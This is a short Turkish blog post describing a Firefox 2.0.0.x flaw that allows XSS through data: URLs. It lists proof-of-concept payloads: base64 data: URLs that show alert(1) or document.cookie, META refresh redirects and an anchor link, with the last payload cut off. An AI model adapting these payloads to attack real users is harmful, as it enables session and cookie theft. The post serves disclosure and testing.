Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox’ta bulundu. 2.0.0.8 versiyonu geçtiğimiz haftalarda çıkmasına rağmen, kısa sürede yeni açıklar tespit edildi. Ayrıca 1 Kasım da çıkan 2.0.0.9 versiyonunda da bu açığın bulunduğu gözlendi. Firefox üzerinde XSS kodlarınırahatça çalıştırabilmek ve data url scheme açığınıkullanabilmek mümkün. Bu açığıtest edebilmeniz için altta bazıörnek kodlar paylaştım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubuğunda deneyebilirsiniz Firefox’un yeni sürümü yakın zamanda çıkabilir.
Alttaki kodlarıFirefox’un adres çubuğuna yapıştırıp deneyebilirsiniz.
CODE:
-
(<script>alert(1);</script> base64‘e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=
-
(<script>alert(document.cookie)</script> base64′e çevirilmiş hali altta. Adres çubuğuna yapıştırıp deneyebilirsiniz.)
-
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
-
-
<META http-equiv=“refresh” content=“5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=”>
-
-
data:text/html,<script>alert(1)</script>
-
-
data:text/cmd;,test
Veya alttaki kodlarıhtml olarak kaydedip te denemeniz mümkün.
CODE:
-
<a href=“data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=”>XSS</a>
-
-
<META http-equiv=“refresh” content=“3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxK
Powered by MightyAdsense
